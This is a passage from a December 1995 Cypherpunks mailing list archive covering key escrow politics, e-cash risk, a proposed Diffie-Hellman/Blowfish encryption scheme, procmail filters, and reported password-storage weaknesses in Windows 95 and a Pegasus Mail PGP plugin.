mandatory nature of the proposal resulting > from the key escrow requirement itself [...] This is pretty weak w.r.t. GAK ("rights to privacy are placed in question by the current [...] proposal"). Most of the position statement really addresses the key length limit. But as far as I'm concerned, it falls clearly on the anti-GAK side of the line. (The phrasing "the mandatory nature of the proposal resulting from the key escrow requirement itself" is a bit ambiguous. I'm taking it to refer to the mandatory nature of Clipper etc.) -Futplex From twcook at cts.com Sat Dec 9 02:19:58 1995 From: twcook at cts.com (Tim Cook) Date: Sat, 9 Dec 95 02:19:58 PST Subject: Netscape speaks with a forked tongue: Message-ID: > he is speaking for Jim Clark. It is possible to not believe in > something ethically, yet see a financial advantage in supporting it. > Their is a distinction that must be made, though admitedly the line > does become fuzzy when a senior person makes a statement, this is > because he is often the one driving the policy. > I think you've made our point. He has to make that distinction at the time he says it, or most of us will ASS-U-ME it's company policy as well. Especially when the statement deals so directly with the company's product. Tim Cook, Mindsource(tm) Librarian. "The World is a Database - Mindsource is the Search Engine." ______________________________________________________________ M I N D S O U R C E (TM) I N F O R M A T I O N N E T W O R K Send a blank Email to:mindsource at memo.net for full information Visit our W3 Site http://www.ultimate.org/mindsource/main.html D E S T I N E D FOR G L O B A L D I S T R I B U T I O N! Concept:"The Greatest Untapped Resource is Human Resource(TM)" Mindsource is a Reg. Trademark Copyright(c)1995 by Mindsource From tcmay at got.net Sat Dec 9 03:06:12 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 9 Dec 95 03:06:12 PST Subject: Netscape announces position against GAK Message-ID: Credit where credit is due. I for one am satisfied--and even pleased--with the Netscape position on GAK. It remains to be seen how steadfast Netscape, as the major player in the Web browser business, remains in the face of (likely) pressure from the government. It seems to me that we have have been quick to criticize Netscape--which is good, the quickness part--and thus we should be equally quick to praise them. To be sure, various of us might've written the Netscape position statement slightly differently, but this does not change the basic point: that Netscape has come out against the Administration's position on GAK. For this they deserve our praise. --Tim May (slightly drunk at 3 a.m. PST after a Robben Ford concert: highly recommended if you like the blues) Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From nobody at REPLAY.COM Sat Dec 9 05:33:56 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 9 Dec 95 05:33:56 PST Subject: E-Mail Privacy (CP boo) Message-ID: <199512091335.OAA26498@utopia.hacktic.nl> Forwarding Cyberia-L mail by: hayam at actcom.co.il (Avraham Hayam) on Sat, 9 Dec 6:16 AM ------------------- Greetings, The only way for E-Mail Privacy on the internet is - ENCRYPTION. You don"t have to be an Internet Expert to understand that data which is not encrypted is open for every one. On Oct. 20 1995 Andy Jonson-Laird sent a most interesting data to the list concerning that the user has absulutly no control ever how the data is routed. A Mail that he sent to an address which is at the distance of 11 miles actualy did 1200 miles. It may be " The end of days vision" that privacy will be maintained without encryption. With the ongoing danger from the Cypherpunks, we must use very strong Algorithms. A French "algorithms cracker" recommended not long ago that the commercial sector have to use not less than 128 bytes based algorithms. I will appreciate to receive list members opinion. Avraham Hayam IT Systems Security Consultants - ITSSC P.O.Box 11233 Jerusalem, 91112 ISRAEL Tel: + 972 - 2 - 761 803; Fax: + 972 - 2 - 769 263 E-Mail: hayam at actcom.co.il From nobody at REPLAY.COM Sat Dec 9 06:03:56 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 9 Dec 95 06:03:56 PST Subject: Congress vs. the Internet Message-ID: <199512091405.PAA27249@utopia.hacktic.nl> NY Times, 9 Dec 1995, Op-Ed. Congress vs. the Internet The courts have upheld free speech. Why won't legislators? By Shari Steele (EFF staff counsel) San Francisco. While the courts continue to uphold the freedom of speech on the Internet, the First Amendment is under attack on Capitol Hill. On Wednesday, House members of a House-Senate conference committee said they would support a stringent new measure that would not only bar words and ideas on the worldwide computer network that one might hear on TV or read in this newspaper, but would make criminals out of anyone transmitting these materials electronically, including on-line servces. This measure goes against the spirit of three sensible court decisions on copyright law handed down in recent weeks, all involving the Church of Scientology. The first decision, issued by a Federal judge in California last month, held that Internet service providers, the gatekeepers to the information highway, cannot be held liable for copyright infringement when they have no knowledge of the content of their users' messages. This decision is important, because, like the telephone company, the system's providers merely offer a conduit for communications. If they can be held liable for the content of messages, they are more likely to monitor those messages and censor any that include language that might get them in trouble. Just as we don't want the phone company censoring our telephone calls, we should be very troubled by any copyright law interpretation that would assign liability to those who provide Internet service. The second and third decisions were issued last week by a Federal judge in northern Virginia. In those cases, the judge, Leonie M. Brinkema, admonished the Church of Scientology for using lawsuits to silence its on-line critics. After two of its former members posted electronic criticism of Church of Scientology writings, the church brought charges against them, their Internet service providers and The Washington Post for including two sentences from church documents in an article on the case. Judge Brinkema dismissed The Washington Post and two of its reporters from the suit and held the Church of Scientology and its affiliate responsible for the newspaper's legal fees. "Although the Religious Technology Center brought the complaint under traditional secular concepts of copyright and trade secret law, it has become clear that a much broader motivation prevailed -- the stifling of criticism and dissent of the religious practices of Scientology and the destruction of its opponents," the judge wrote. The judge called this motivation "reprehensible." While the results of these preliminary decisions are encouraging, they provide little solace to the larger threat of on-line censorship. Court decisions in the copyright realm, as these are, do not address the damage Congress is doing to the First Amendment h the name of protecting children from obscenity, which remains ill-defind. These early court victories are important, and the on-line world breathed a collective sigh of relief over the wise judgments. But not all battles can be won in court. If Congress presses forward with its attempt to criminalize constitutionally protected speech, I fear that the First Amendment will be left behind as more and more of what we say is in the form of on-line communications. ----- From wb8foz at nrk.com Sat Dec 9 06:26:10 1995 From: wb8foz at nrk.com (David Lesher) Date: Sat, 9 Dec 95 06:26:10 PST Subject: NSA flying disk follow-up [Extremely Frivolous] In-Reply-To: Message-ID: <199512091424.JAA05252@nrk.com> > > > I spoke with Dennis Cisco at the NSA today, and he is > unwilling to sell or otherwise distribute the NSA flying > disk promotional items "except at trade shows where we > are promoting our technology transfer program." Since they > are not planning on attending any such conferences in my > area in the near future, it is unlikely I'll be able to help > any of the (numerous) people who expressed an interest in > obtaining one of these fine flying disks. > (http://www.communities.com/foo/NSAfris.gif) Hmmmm. Gov't doc's can't be copyrighted; and if they're givng it out -- it ain't Sekret. How about a new version with perl bar code ;-? -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From dan at milliways.org Sat Dec 9 06:32:34 1995 From: dan at milliways.org (Dan Bailey) Date: Sat, 9 Dec 95 06:32:34 PST Subject: Win NT proprietary pw encryption (Was: Re: Windows .PW Message-ID: <199512091433.OAA27353@pop01.ny.us.ibm.net> On Sat, 9 Dec 1995 03:15:51 -0500 (EST) you wrote: >I don't quite agree with the last part. It might be educational to do a spot >of cryptanalysis in an attempt to determine the nature of the proprietary >algorithm used. It wouldn't be "cracking" the password protection, but I >think the general effort to "out" proprietary crypto algorithms is productive, >particularly in the case of major software packages. > > >Anyone feel like putting together some sample plaintext/ciphertext pairs ? > Well, the problem with coming up with plaintext/ciphertext is that I've never been able to find out exactly where the the SAM database is physically stored. Using Registry Editor, it's visible but not accessible as part of the Registry. Microsoft's APIs won't give you access to the stored ciphertext, so some serious hacking is required here, I'm just not sure where to begin. I think a hacked version of the Registry APIs that allow you to read the ciphertext would be a good place to start, but again, I'm not sure where to begin writing such a thing. The second problem is that we're not sure exactly what gets hashed and in what order. Is it username0x00password0x00domainname0x00SID or something similar? Tough to tell and MSoft wants to rely on the "tamper-proofness" of NT rather than on algorithmic security. If anyone has more information on these issues, I'd love to know what's really going on there. Dan *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From nsb at nsb.fv.com Sat Dec 9 06:40:42 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 9 Dec 95 06:40:42 PST Subject: Geodesic Payment Systems? In-Reply-To: <2.2b8.32.19951208104734.00878b10@panix.com> Message-ID: Excerpts from mail.nonpersonal: 8-Dec-95 Re: Geodesic Payment Systems? Duncan Frissell at panix.co (912*) > I seem to remember from my favorite Law School class -- Commercial Paper -- > that banks weren't liable if they paid out an account from cleared funds > under the terms of the account. A bank is responsible for payments made on > a forged drawer's signature and anyone who accepts an instrument from a > forged endorser eats the loss. But online clearing with digital signatures > makes it hard to forge the drawer's signature and digital cash doesn't have > the sort of endorsement system used on paper checks. I think you're drawing a misleading analogy. When I present e-cash to the institution the underwrites the conversion from e-cash to "real money", they have to decide if it's real or not. If the e-cash is anonymous, they are the *only* people on the line -- anonymous e-cash doesn't carry history or say "this money is coming out of so-and-so's account". It is anonymous e-cash being converted to real money, and the converting bank carries essentially all of the risk. As far as the guarantees offered by digital signatures are concerned, the whole point of my comments was to analyze the risks involved when secret keys are compromised. In this case, by definition, the digital signatures are not very useful any more. -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From nsb at nsb.fv.com Sat Dec 9 06:59:42 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 9 Dec 95 06:59:42 PST Subject: More FUD from First Virtual In-Reply-To: Message-ID: Excerpts from mail.nonpersonal: 8-Dec-95 Re: More FUD from First Vir.. jim bell at pacifier.com (1033*) > What can stop it? What should stop it? Jon's right in identifying government as an entity that might try to stop it, and might succeed to a frightening extent. But they're not the only ones. Plenty of financial industry people and corporations have similar motivations. However, the real problem, I believe, is involved in the technology of deploying and operating anonymous e-cash. >From a deployment standpoint, e-cash will be crippled if there are even a few highly visible incidents in which the security of the system is compromised, because it will scare the dickens out of whoever's doing the conversion to real money (not to mention the users!). Given that the system is being built and administered by human beings, such incidents are almost inevitable. To put it simply: anonymous e-cash is a technological artifact that is designed in such a way as to create a catastrophic failure scenario. However low-probability such a scenario is, I am a firm believer in Murphy's law: what can go wrong will go wrong. The history of technology is overflowing with examples that underscore this fact. Now, people do effectively use technologies with low-probability catastrophic risks, but they generally do so because of a compelling motivation. People strap themselves into the space shuttle because, in exchage for the risk, they get to go into orbit, a pretty unusual opportunity. Many medical procedures bear catastrophic risks which people endure in the hope of relief from pain or other ailments. For a real-world example, I have an inner ear disorder that makes me frequently dizzy. There's an operation that would have about a 95% chance of curing me, and a 5% chance of making me deaf. As a musician, I have no motivation to take this gamble. Alan Shepherd had the same inner ear disorder, but he wasn't a musician, and he needed to be cured of the dizziness in order to fly an Apollo rocket to the moon. He had the surgery and flew to the moon. If I had a chance to fly to the moon, I might risk my hearing too, but absent that possibility I prefer the dizziness. The big question is what motivates people to accept risks. The real open question about anonymous digital cash is whether people will want it badly enough to bear that kind of risk. My guess is that a few people will, and that a few (even fewer) small banks will accept the risk, so there will indeed be a niche in anonymous cash. But I think that for better or worse, most people and banks won't value anonymity so highly as to incur a low-probability catastrophic risk, which I think is inherent in anonymous cash. > Well, maybe I haven't been following those reasons, but I see little or no > reason privacy should "inevitably carry a high surcharge." If the relevant > encryptions had to be carried out with a pencil and a piece of paper, that > claim would make sense, but remember, we've got MICROPROCESSORS on our side! The cost isn't the computation. The cost comes primarily from the efforts (both practical and actuarial) that will be made by the underwriters to minimize and amortize their risk. As Lloyds of London has demonstrated, almost any risk can be undertaken at a high enough premium.... -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From jya at pipeline.com Sat Dec 9 07:14:09 1995 From: jya at pipeline.com (John Young) Date: Sat, 9 Dec 95 07:14:09 PST Subject: MAG_got Message-ID: <199512091515.KAA13918@pipe2.nyc.pipeline.com> The NYPaper Sunday Mag 12-10-95 has a longish soft-hitter by Tim Weiner about the CIA's never-say-die Deutch-uncle's CPR-wheezing the wormy carcass. MAG_got From joelm at eskimo.com Sat Dec 9 09:14:06 1995 From: joelm at eskimo.com (Joel McNamara) Date: Sat, 9 Dec 95 09:14:06 PST Subject: .PWL spin Message-ID: <199512091715.JAA29227@mail.eskimo.com> The Seattle Times has a rather large article this morning (12/9/95) about Microsoft's .PWL encryption weakness. Selected quotes are provided for your entertainment and enlightenment (give yourself one point for each piece of inaccurate/incomplete information or spin you can find). Security flaw in Windows 95 to be fixed Microsoft got word of the flaw from an Internet e-mail exchange last week that included a short computer program for "hacking," or decrypting, passwords contained in .pwl (password list) files. The company immediately began working on a fix. "We wanted to be proactive on this before it became a problem," said Rob Bennett, Windows 95 product manager. The company has received no customer complaints related to the issue and knows of no security breaches, Bennett said. "There are people out there who will stay up all night cranking out code to break any encryption," Bennett said. (This was followed by some good quotes from Frank Stevenson, who wrote the cracking code, on the seriousness of the weakness. I was a little surprised to see the reporter listed Frank's e-mail address in the article. Frank, if you're reading this, did you give Paul Andrews permission? To me, this seems like listing someone's telephone number and address in the body of an article.) Microsoft said it plans to strengthen the encryption, Bennett said. Password data will be stored randomly, making it harder to find on the computer, he added. Microsoft recommends that information-systems directors disable password storage until the fix is released. One system administrator said the problem would have a greater effect on less-secure environments, such as universities and other institutions, than on corporations. From froomkin at law.miami.edu Sat Dec 9 10:06:41 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sat, 9 Dec 95 10:06:41 PST Subject: Escrow expectations In-Reply-To: Message-ID: On Sat, 9 Dec 1995, Black Unicorn wrote: > On Fri, 8 Dec 1995, Adam Shostack wrote: > > > If there is no expectation of privacy when a key is escrowed > > with Bob, or my companies attorneys, then would there be any > > expectation of privacy under Clipper? Perhaps this is a powerful > > argument we should expect to have used against us... > > > > "Your honor, we argue that in escrowing his keys with the US > > government, the defendant should have known his communications could > > be listened to, and thus has no expectation of privacy." > > Uh, this was the entire point of that thread "is a lawyer in the house" yes. > I argue in my Clipper article that while the government might make that argument, it would be unconscionable for the court to accept it. I think there is a reasonable chance that the court would not. But no certainty. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From jimbell at pacifier.com Sat Dec 9 12:07:32 1995 From: jimbell at pacifier.com (jim bell) Date: Sat, 9 Dec 95 12:07:32 PST Subject: More FUD from First Virtual Message-ID: At 09:58 AM 12/9/95 -0500, you wrote: > >The real open question about anonymous digital cash is whether people >will want it badly enough to bear that kind of risk. My guess is that a >few people will, and that a few (even fewer) small banks will accept the >risk, so there will indeed be a niche in anonymous cash. But I think >that for better or worse, most people and banks won't value anonymity so >highly as to incur a low-probability catastrophic risk, which I think is >inherent in anonymous cash. I find this hard (read: "impossible") to believe. The significance of the risk is, essentially, its magnitude multiplied by its probability. Assuming that its probability is reduced to an arbitrarily low value, SOMEBODY will be willing to accept the risk in exchange for a return. By way of comparison, most credit card companies charge 2-3% of the value of a transaction, which apparently the market has decided is a "reasonable" cost. The question is, why wouldn't it be possible to raise the reliability of the whole digital cash system simply to the point where somebody is willing to accept the risk for, say, 0.5% of the value of each transaction, which would be a good improvement over credit cards? The answer, I think, it that there would be no problem finding people to take that risk in exchange for the return, ESPECIALLY if they have some input into the design (level of security) of the system. They might insist on 2048-bit RSA keys, instead of 1024-bit, for example. >> Well, maybe I haven't been following those reasons, but I see little or no >> reason privacy should "inevitably carry a high surcharge." If the relevant >> encryptions had to be carried out with a pencil and a piece of paper, that >> claim would make sense, but remember, we've got MICROPROCESSORS on our side! > >The cost isn't the computation. The cost comes primarily from the >efforts (both practical and actuarial) that will be made by the >underwriters to minimize and amortize their risk. As Lloyds of London >has demonstrated, almost any risk can be undertaken at a high enough >premium.... However, the premium only needs to be high enough to cover the actual risk, plus perhaps a little profit on the deal. (Even if the premium was 10x the actual risk, or even 100x, I think it would end up costing well under 1% of each transaction.) Your arguments seem to only be qualitative, not quantitative. Maybe that's why the other guy calls them "FUD." From pfarrell at netcom.com Sat Dec 9 12:43:37 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sat, 9 Dec 95 12:43:37 PST Subject: DC Cypherpunks Meeting, Dec 16. 3:00 PM Message-ID: <56678.pfarrell@netcom.com> Just a quick note: the next DC Cypherpunks meeting will be December 16, starting at 3:00 PM, location: Digex Headquarters, Greenbelt MD. See my dccp page for detail, instructions, etc. http://www.isse.gmu.edu/~pfarrell/dccp/index.html Agenda: 1) Discussion of NIST Dec 5 GAK meeting 2) The web of trust is dead, lets invent another 3) ... suggestions welcome Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From 72124.3234 at compuserve.com Sat Dec 9 12:48:00 1995 From: 72124.3234 at compuserve.com (Kent Briggs) Date: Sat, 9 Dec 95 12:48:00 PST Subject: Diffie-Hellman with Blowfish Message-ID: <951209204827_72124.3234_EHJ183-1@CompuServe.COM> I am working on a program that will use Diffie-Hellman with Blowfish to create a public-key encryption system similar to the way PGP uses RSA and IDEA. This system would not have the digital signature feature that PGP has, however. I invite comments on any security problems that I might have overlooked. Bruce Schneier briefly mentions this idea on p. 515 of Applied Cryptography (2nd ed): Key Exchange Without Exchanging Keys. Key Generation -------------- First, users select a private key passphrase. The passphrase is case sensitive and from 8 to 50 characters in length. A random 32-bit salt is generated from timed keystrokes. The salt is appended to the passphrase and run through an SHA-1 hash. The output is a 160-bit value, x. The 1024-bit public key "y" is calculated: y = g^x mod p (^ denotes exponentiation) p is a 1024-bit strong prime constant that does not change. g is the generator for that prime and is always 2. The KeyID for the public key is the 32-bit salt. The user publishes the public key and KeyID values. The key should be certified to prevent a man in the middle attack. The user imports public keys from others and places them on their public key ring. Note that there is no private key ring. I could have used the PGP method and made the private key a random number and then encrypted that number with a passphrase. This would be more secure but I was worried about users deleting their private key file. The 32-bit salt will discourage a pre-computed dictionary attack. An attacker would have to run over 4 billion SHA's and D-H's and store the result for every passphrase in their dictionary. To discourage a dictionary attack on a specific public key, I will include a tutorial on how to choose a secure passphrase. Encryption ---------- The program will generate a 160-bit random private session key "r" based on timed keystrokes by the user. A 1024-bit public session key "z" is calculated: z=g^r mod p z is stored in the file header. For each recipient, a "k" value is calculated using the recipient's public key: k=y^r mod p The session key r is now encrypted for each recipient by running each k through an SHA-1 hash and xoring the output with r: k'=SHA(k) xor r For each recipient the 160-bit k' value is stored with the recipient's 32-bit KeyID value in the file header. Each additional recipient adds 24 bytes to the file header. The plaintext is then encrypted with Blowfish in CBC mode using the 160-bit r value as the key. r is then discarded. Note that I use the same r key for the Blowfish session key and the Diffie-Hellman private key. I could have generated a separate r1 for Blowfish and an r2 for D-H but I don't think this is necessary. Decryption ---------- The public session key z is retrieved from the file header. Each recipient matches their KeyID with one of the KeyIDs stored in the file header. From this match they get their particular k' value. They enter their private key passphrase, append the KeyID salt and run it through an SHA-1 hash to get x. k is then calculated: k=z^x mod p The original private session key r is decrypted: r=SHA(k) xor k' The ciphertext is decrypted using Blowfish with key r. ======================================================= Does anyone see any obvious security problems that I might have overlooked? Kent Briggs kbriggs at execpc.com CIS: 72124,3234 From anonymous-remailer at shell.portal.com Sat Dec 9 13:08:42 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 9 Dec 95 13:08:42 PST Subject: Warning about Pegasus Mail and PGP (fwd) Message-ID: <199512092108.NAA11006@jobe.shell.portal.com> Forwarded message. From: investor at flood.xnet.com (Investortools) Newsgroups: alt.security.pgp Subject: warning about PMail-PGP Date: 9 Dec 1995 00:47:46 GMT Organization: XNet - A Full Service Internet Provider - (708) 983-6064 Lines: 5 Message-ID: <4aambi$e33 at flood.xnet.com> NNTP-Posting-Host: cyclone.xnet.com X-Newsreader: TIN [version 1.2 PL2] I just installed the "Open Encryptor" PGP interface for Pegasus Mail. I found that when you sign a message and queue it, it stores your password in the clear on the hard drive. Apparently it doesn't sign or encrypt the message until just before transmitting it. So it stores your PGP private key password with the message until it sends it. From jlasser at rwd.goucher.edu Sat Dec 9 13:30:08 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Sat, 9 Dec 95 13:30:08 PST Subject: Warning about Pegasus Mail and PGP (fwd) In-Reply-To: <199512092108.NAA11006@jobe.shell.portal.com> Message-ID: On Sat, 9 Dec 1995 anonymous-remailer at shell.portal.com wrote: > I just installed the "Open Encryptor" PGP interface for Pegasus Mail. I found that when you sign a message and queue it, it stores your password in the clear on the hard drive. Apparently > it doesn't sign or encrypt the message until just before > transmitting it. So it stores your PGP private key password > with the message until it sends it. Can anyone verify this? Kinda brings new meaning to the term "Open Encryptor," huh? Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From adam at homeport.org Sat Dec 9 13:48:12 1995 From: adam at homeport.org (Adam Shostack) Date: Sat, 9 Dec 95 13:48:12 PST Subject: More FUD from First Virtual In-Reply-To: Message-ID: <199512092151.QAA05278@homeport.org> jim bell wrote: [Good points about cost of transactions deleted] | The answer, I think, it that there would be no problem finding people to | take that risk in exchange for the return, ESPECIALLY if they have some | input into the design (level of security) of the system. They might insist | on 2048-bit RSA keys, instead of 1024-bit, for example. (I know its only an example, but...) Key length is not what is needed for better security; more solid code and better interfaces are needed. (I might also argue for hardware keys that are more difficult to steal..) Cryptosystems fail because of bad storage of keys, coding mistakes, accidentally writing passphrases to disk during a swap, etc. Moving to 2048 bit keys is no help if you lose the key to a non-cryptanalytic attack. Moving to keys with a week or day lifetimes might be better. You need to figure how the system might fail, and design to protect yourself from those failures. Keys with a thousand bits aren't lost to factoring very often. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From reagle at rpcp.mit.edu Sat Dec 9 14:10:10 1995 From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.) Date: Sat, 9 Dec 95 14:10:10 PST Subject: .PWL spin Message-ID: <9512092212.AA22246@rpcp.mit.edu> At 09:11 AM 12/9/95 -0800, Joel McNamara wrote: >Microsoft said it plans to strengthen the encryption, Bennett said. >Password data will be stored randomly, making it harder to find on the >computer, he added. Oh that is clever! (Security through obscurity!) Make it all the harder to back up the file! I had the minimal amount of security W95 allows one to have by having the default user not be able to do anything, then the me user to everything (for which you needed a password...) Of course my registry got corrupted (eudora beta for W95) and the only damn thing it did remember was that the default user couldn't do anything, and it no longer knew who I was... So now, I don't even bother with that, I'm just hoping securdrv, sfs, or something makes it to W95 one of these days... (I doubt either of those will make it...) _______________________ Regards, It is absurd to divide people into good and bad. People are either charming or tedious." -Oscar Wilde. Joseph Reagle http://farnsworth.mit.edu/~reagle/home.html reagle at mit.edu 0C 69 D4 E8 F2 70 24 33 B4 5E 5E EC 35 E6 FB 88 From wilcoxb at nagina.cs.colorado.edu Sat Dec 9 14:31:53 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Sat, 9 Dec 95 14:31:53 PST Subject: CP: Mailing List Subjects In-Reply-To: Message-ID: <199512092233.PAA01871@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- I use mh and slocal and .maildevilry-- er.. I mean .maildelivery. It seems to have a much less steep learning curve than procmail does, and it does everything that I need it to do. Bryce signature follows -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 iQCVAwUBMMoOi/WZSllhfG25AQFa+QP9EQ/C7H2dgucNLXJ0PlyxNnNXudy3L0Xi 4kyCBO6htaHDSVzTOXnGVM9ppsEAHL09YdzOfJqktWOG7kt4GxM/c01r50lteKGb KmDukT72udDztll9FhlQ8PTMlyv6qDjYID03wkgtymVH3CAyO3bDRaEHQDHEQCyj ayhCjOVa21I= =iD9R -----END PGP SIGNATURE----- From fstuart at vetmed.auburn.edu Sat Dec 9 14:58:09 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Sat, 9 Dec 95 14:58:09 PST Subject: Netscape announces position against GAK Message-ID: <199512092259.QAA11480@snoopy.vetmed.auburn.edu> >From: tcmay at got.net (Timothy C. May) >Subject: Re: Netscape announces position against GAK > >Credit where credit is due. > >I for one am satisfied--and even pleased--with the Netscape position on GAK. > >It remains to be seen how steadfast Netscape, as the major player in the >Web browser business, remains in the face of (likely) pressure from the >government. > >It seems to me that we have have been quick to criticize Netscape--which is >good, the quickness part--and thus we should be equally quick to praise >them. To be sure, various of us might've written the Netscape position >statement slightly differently, but this does not change the basic point: >that Netscape has come out against the Administration's position on GAK. > >For this they deserve our praise. I agree with all of Tim's sentiments (well, in this message, anyway :>). I'd especially like to thank Jeff Weinstein for his hard work keeping both us and Netscape management informed. I think he's done us both a great service. To avoid just saying "me too", I'll throw out another idea on making the U.S. version of Netscape available to U.S. users over the Internet. How about a phone number to call to get an access id of some sort that can be used to FTP the software. When you call the number, you can use caller-id to verify that the person is calling from within the U.S. You could set up a BBS-type system to do this automatically, or make the phone number a 900 number and charge a few dollars to cover your costs. You could also set up the access id so that it can only be used once. | (Douglas) Hofstadter's Law: Frank Stuart | It always takes longer than you expect, even fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law. From pjm at ionia.engr.sgi.com Sat Dec 9 15:44:42 1995 From: pjm at ionia.engr.sgi.com (Patrick May) Date: Sat, 9 Dec 95 15:44:42 PST Subject: CP: Mailing List Subjects In-Reply-To: <199512090643.WAA26800@jobe.shell.portal.com> Message-ID: <199512092346.PAA12661@ionia.engr.sgi.com> -----BEGIN PGP SIGNED MESSAGE----- anonymous-remailer at shell.portal.com writes: > On Fri, 8 Dec 1995, Michael Handler wrote: > > Learn procmail. It'll save you hours upon hours of time. > > > > :0: > > * (^From owner-cypherpunks at toad\.com|^Sender: owner-cypherpunks at toad\.com) > > lists/cypherpunks > > Would the following work?? > > :0 > * (^From|^Sender).*owner-cypherpunks at toad.com > |/usr/bin/contrib/procmail -m ~/.punk_rc Here's a .procmailrc file that will save all cypherpunks messages to the file $HOME/Mail/IN.cypherpunks. Note that the directories $HOME/.procmail and $HOME/Mail must exist. - ----- begin .procmailrc ----- #Set on when debugging VERBOSE=off #Replace ``mail'' with your mail directory (Pine uses mail, Elm uses Mail) MAILDIR=$HOME/Mail #Directory for storing procmail log and rc files PMDIR=$HOME/.procmail LOGFILE=$PMDIR/log #INCLUDERC=$PMDIR/rc.test #INCLUDERC=$PMDIR/rc.folders :0: * ^TOcypherpunks IN.cypherpunks - ----- end .procmailrc ----- > Does anyone know where the procmail archives are?? There are some good pointers to filtering information at: http://www.jazzie.com/ii/internet/mailbots.html Regards, pjm -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMofoe5Yg08fDKehAQGYxQQAnPEw5vUlvuWSvFZXz24RM387WhgAUjM2 YeK4XK3Z8DbekeHclId6XeeoMFJWdnhmtyhs6xC2eIi0gyWQiKyPKlrnjE6Ve0rn 0rnp9jZjVqwIiJH36CZTX6YmgAC/43AnUuuixOjAO77qPP7td+4bciLqJKOkHovK /Rf9lcN2i3s= =xi2l -----END PGP SIGNATURE----- From greg at ideath.goldenbear.com Sat Dec 9 16:25:55 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sat, 9 Dec 95 16:25:55 PST Subject: ideath remailer temporarily down Message-ID: <199512092345.AA05521@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- The remailer located at remailer at ideath.goldenbear.com is currently unavailable because the local freenet (which handles DNS and MX service for goldenbear.com) is making some configuration changes. Apologies for not warning anyone, but I didn't get a warning either. Incoming mail for goldenbear.com should be spooling on sender's machines; I haven't received any since late Thursday (12/7) evening. I don't know when they'll get this fixed but I'm kinda pissed off about it and am exploring alternatives. Doh. I'm reachable as gbroiles at darkwing.uoregon.edu as well. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMofY33YhjZY3fMNAQG7rwP/cLSbiqtDCm1frYSOqxTIitTaP/36v/7g W+azO+zC1+k6ozWaGwcCqtgwi2Kmbv/XtCnDbzzQdSI6k0rJFwhbw5rDkxQ4W5sQ 9PNHO9UC1F7JyAEs7kTiZSxZpkqRdzx98P06wRfy4Hwkzy7OuoYm2jHYNlHDojcv 9Jx6wYWVlIo= =QLxL -----END PGP SIGNATURE----- From klong at phoenix.net Sat Dec 9 16:27:32 1995 From: klong at phoenix.net (Siberia) Date: Sat, 9 Dec 95 16:27:32 PST Subject: Warning about Pegasus Mail and PGP (fwd) Message-ID: <199512100028.SAA26091@phoenix.net> Okay, here's how I understand things with PGP and Pegasus. You have two options with Pegasus depending on the set-up options you choose. You can either send upon completion of your out-going email, or you can have your mail queued until you press the send out-going mail button. The actual PGP process does not occur until you actually send the mail. So the answer would be: don't queue your mail. On 9 Dec 95 at 16:24, Jon Lasser wrote: > On Sat, 9 Dec 1995 anonymous-remailer at shell.portal.com wrote: > > > I just installed the "Open Encryptor" PGP interface for Pegasus Mail. > > I found that when you sign a message and queue it, it stores your password > > in the clear on the hard drive. Apparently > > it doesn't sign or encrypt the message until just before > > transmitting it. So it stores your PGP private key password > > with the message until it sends it. > > Can anyone verify this? > > Kinda brings new meaning to the term "Open Encryptor," huh? > > Jon > ------------------------------------------------------------------------------ > Jon Lasser (410)494-3072 > Visit my home page at http://www.goucher.edu/~jlasser/ > You have a friend at the NSA: Big Brother is watching. Finger for PGP key. > > > Namaste' Kimberly Long klong at phoenix.net What is life? It is the flash of a firefly in the night. It is the breath of a buffalo in the wintertime. It is the little shadow which runs across the grass and loses itself in the sunset. ~Crowfoot 1821-1890 )O( From djw at pdcorp.com Sat Dec 9 16:47:06 1995 